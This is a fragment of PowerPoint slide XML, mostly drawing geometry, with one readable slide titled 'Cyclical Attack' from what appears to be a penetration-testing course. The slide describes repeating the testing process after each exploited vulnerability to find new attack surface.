                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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05" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19"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06" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3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grpSp>
      </p:gr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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Cyclical Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Once exploitation happens, don</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'t stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Follow the process again …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>… From that point, looking for new attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each successfully exploited vulnerability usually opens new avenues for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Mapping new parts of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Additional applications now accessible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>And possibly even the network infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Other vulnerabilities exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Our job is to find them!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3077" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="5791200"/>
            <a:ext cx="1066800" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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3078" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4130675" y="5495925"/>
            <a:ext cx="1028700" cy="271463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1029665"/>
              <a:gd name="T1" fmla="*/ 335020 h 270792"/>
              <a:gd name="T2" fmla="*/ 401067 w 1029665"/>
              <a:gd name="T3" fmla="*/ 9436 h 270792"/>
              <a:gd name="T4" fmla="*/ 949897 w 1029665"/>
              <a:gd name="T5" fmla="*/ 278398 h 270792"/>
              <a:gd name="T6" fmla="*/ 949897 w 1029665"/>
              <a:gd name="T7" fmla="*/ 278398 h 270792"/>
              <a:gd name="T8" fmla="*/ 949897 w 1029665"/>
              <a:gd name="T9" fmla="*/ 278398 h 270792"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 1029665"/>
              <a:gd name="T16" fmla="*/ 0 h 270792"/>
              <a:gd name="T17" fmla="*/ 1029665 w 1029665"/>
              <a:gd name="T18" fmla="*/ 270792 h 270792"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="1029665" h="270792">
                <a:moveTo>
                  <a:pt x="0" y="270792"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="131568" y="143024"/>
                  <a:pt x="263137" y="15256"/>
                  <a:pt x="434748" y="7628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="606359" y="0"/>
                  <a:pt x="1029665" y="225024"/>
                  <a:pt x="1029665" y="225024"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3079" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6132513" y="5486400"/>
            <a:ext cx="1030287" cy="271463"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1029665"/>
              <a:gd name="T1" fmla="*/ 335020 h 270792"/>
              <a:gd name="T2" fmla="*/ 457922 w 1029665"/>
              <a:gd name="T3" fmla="*/ 9436 h 270792"/>
              <a:gd name="T4" fmla="*/ 1084562 w 1029665"/>
              <a:gd name="T5" fmla="*/ 278398 h 270792"/>
              <a:gd name="T6" fmla="*/ 1084562 w 1029665"/>
              <a:gd name="T7" fmla="*/ 278398 h 270792"/>
              <a:gd name="T8" fmla="*/ 1084562 w 1029665"/>
              <a:gd name="T9" fmla="*/ 278398 h 270792"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 1029665"/>
              <a:gd name="T16" fmla="*/ 0 h 270792"/>
              <a:gd name="T17" fmla="*/ 1029665 w 1029665"/>
              <a:gd name="T18" fmla="*/ 270792 h 270792"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="1029665" h="270792">
                <a:moveTo>
                  <a:pt x="0" y="270792"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="131568" y="143024"/>
                  <a:pt x="263137" y="15256"/>
                  <a:pt x="434748" y="7628"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="606359" y="0"/>
                  <a:pt x="1029665" y="225024"/>
                  <a:pt x="1029665" y="225024"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">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p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3080" name="Group 86"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4953000"/>
            <a:ext cx="892175" cy="1309688"/>
            <a:chOff x="228" y="851"/>
            <a:chExt cx="334" cy="490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="3074" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="228" y="1003"/>
            <a:ext cx="324" cy="338"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s267354" name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId4" imgW="2501798" imgH="2616098" progId="">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 y="1003"/>
                          <a:ext cx="324" cy="338"/>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084" name="Rectangle 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="327" y="1041"/>
              <a:ext cx="121" cy="91"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF0043"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="30000"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0043"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3085" name="Group 89"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="228" y="851"/>
              <a:ext cx="334" cy="214"/>
              <a:chOff x="288" y="2254"/>
              <a:chExt cx="528" cy="338"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3086" name="Freeform 90"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="288" y="2254"/>
                <a:ext cx="528" cy="338"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1616"/>
                  <a:gd name="T1" fmla="*/ 0 h 1034"/>
                  <a:gd name="T2" fmla="*/ 0 w 1616"/>
                  <a:gd name="T3" fmla="*/ 0 h 1034"/>
                  <a:gd name="T4" fmla="*/ 0 w 1616"/>
                  <a:gd name="T5" fmla="*/ 0 h 1034"/>
                  <a:gd name="T6" fmla="*/ 0 w 1616"/>
                  <a:gd name="T7" fmla="*/ 0 h 1034"/>
                  <a:gd name="T8" fmla="*/ 0 w 1616"/>
                  <a:gd name="T9" fmla="*/ 0 h 1034"/>
                  <a:gd name="T10" fmla="*/ 0 w 1616"/>
                  <a:gd name="T11" fmla="*/ 0 h 1034"/>
                  <a:gd name="T12" fmla="*/ 0 w 1616"/>
                  <a:gd name="T13" fmla="*/ 0 h 1034"/>
                  <a:gd name="T14" fmla="*/ 0 w 1616"/>
                  <a:gd name="T15" fmla="*/ 0 h 1034"/>
                  <a:gd name="T16" fmla="*/ 0 w 1616"/>
                  <a:gd name="T17" fmla="*/ 0 h 1034"/>
                  <a:gd name="T18" fmla="*/ 0 w 1616"/>
                  <a:gd name="T19" fmla="*/ 0 h 1034"/>
                  <a:gd name="T20" fmla="*/ 0 w 1616"/>
                  <a:gd name="T21" fmla="*/ 0 h 1034"/>
                  <a:gd name="T22" fmla="*/ 0 w 1616"/>
                  <a:gd name="T23" fmla="*/ 0 h 1034"/>
                  <a:gd name="T24" fmla="*/ 0 w 1616"/>
                  <a:gd name="T25" fmla="*/ 0 h 1034"/>
                  <a:gd name="T26" fmla="*/ 0 w 1616"/>
                  <a:gd name="T27" fmla="*/ 0 h 1034"/>
                  <a:gd name="T28" fmla="*/ 0 w 1616"/>
                  <a:gd name="T29" fmla="*/ 0 h 1034"/>
                  <a:gd name="T30" fmla="*/ 0 w 1616"/>
                  <a:gd name="T31" fmla="*/ 0 h 1034"/>
                  <a:gd name="T32" fmla="*/ 0 w 1616"/>
                  <a:gd name="T33" fmla="*/ 0 h 1034"/>
                  <a:gd name="T34" fmla="*/ 0 w 1616"/>
                  <a:gd name="T35" fmla="*/ 0 h 1034"/>
                  <a:gd name="T36" fmla="*/ 0 w 1616"/>
                  <a:gd name="T37" fmla="*/ 0 h 1034"/>
                  <a:gd name="T38" fmla="*/ 0 w 1616"/>
                  <a:gd name="T39" fmla="*/ 0 h 1034"/>
                  <a:gd name="T40" fmla="*/ 0 w 1616"/>
                  <a:gd name="T41" fmla="*/ 0 h 1034"/>
                  <a:gd name="T42" fmla="*/ 0 w 1616"/>
                  <a:gd name="T43" fmla="*/ 0 h 1034"/>
                  <a:gd name="T44" fmla="*/ 0 w 1616"/>
                  <a:gd name="T45" fmla="*/ 0 h 1034"/>
                  <a:gd name="T46" fmla="*/ 0 w 1616"/>
                  <a:gd name="T47" fmla="*/ 0 h 1034"/>
                  <a:gd name="T48" fmla="*/ 0 w 1616"/>
                  <a:gd name="T49" fmla="*/ 0 h 1034"/>
                  <a:gd name="T50" fmla="*/ 0 w 1616"/>
                  <a:gd name="T51" fmla="*/ 0 h 1034"/>
                  <a:gd name="T52" fmla="*/ 0 w 1616"/>
                  <a:gd name="T53" fmla="*/ 0 h 1034"/>
                  <a:gd name="T54" fmla="*/ 0 w 1616"/>
                  <a:gd name="T55" fmla="*/ 0 h 1034"/>
                  <a:gd name="T56" fmla="*/ 0 w 1616"/>
                  <a:gd name="T57" fmla="*/ 0 h 1034"/>
                  <a:gd name="T58" fmla="*/ 0 w 1616"/>
                  <a:gd name="T59" fmla="*/ 0 h 1034"/>
                  <a:gd name="T60" fmla="*/ 0 w 1616"/>
                  <a:gd name="T61" fmla="*/ 0 h 1034"/>
                  <a:gd name="T62" fmla="*/ 0 w 1616"/>
                  <a:gd name="T63" fmla="*/ 0 h 1034"/>
                  <a:gd name="T64" fmla="*/ 0 w 1616"/>
                  <a:gd name="T65" fmla="*/ 0 h 1034"/>
                  <a:gd name="T66" fmla="*/ 0 w 1616"/>
                  <a:gd name="T67" fmla="*/ 0 h 1034"/>
                  <a:gd name="T68" fmla="*/ 0 w 1616"/>
                  <a:gd name="T69" fmla="*/ 0 h 1034"/>
                  <a:gd name="T70" fmla="*/ 0 w 1616"/>
                  <a:gd name="T71" fmla="*/ 0 h 1034"/>
                  <a:gd name="T72" fmla="*/ 0 w 1616"/>
                  <a:gd name="T73" fmla="*/ 0 h 1034"/>
                  <a:gd name="T74" fmla="*/ 0 w 1616"/>
                  <a:gd name="T75" fmla="*/ 0 h 1034"/>
                  <a:gd name="T76" fmla="*/ 0 w 1616"/>
                  <a:gd name="T77" fmla="*/ 0 h 1034"/>
                  <a:gd name="T78" fmla="*/ 0 w 1616"/>
                  <a:gd name="T79" fmla="*/ 0 h 1034"/>
                  <a:gd name="T80" fmla="*/ 0 w 1616"/>
                  <a:gd name="T81" fmla="*/ 0 h 1034"/>
                  <a:gd name="T82" fmla="*/ 0 w 1616"/>
                  <a:gd name="T83" fmla="*/ 0 h 1034"/>
                  <a:gd name="T84" fmla="*/ 0 w 1616"/>
                  <a:gd name="T85" fmla="*/ 0 h 1034"/>
                  <a:gd name="T86" fmla="*/ 0 w 1616"/>
                  <a:gd name="T87" fmla="*/ 0 h 1034"/>
                  <a:gd name="T88" fmla="*/ 0 w 1616"/>
                  <a:gd name="T89" fmla="*/ 0 h 1034"/>
                  <a:gd name="T90" fmla="*/ 0 w 1616"/>
                  <a:gd name="T91" fmla="*/ 0 h 1034"/>
                  <a:gd name="T92" fmla="*/ 0 w 1616"/>
